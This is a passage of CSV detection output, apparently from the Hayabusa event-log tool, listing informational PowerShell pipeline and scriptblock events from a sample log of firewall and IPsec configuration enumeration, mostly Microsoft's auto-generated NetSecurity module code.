Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 
+00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { 
[object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) 
$__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 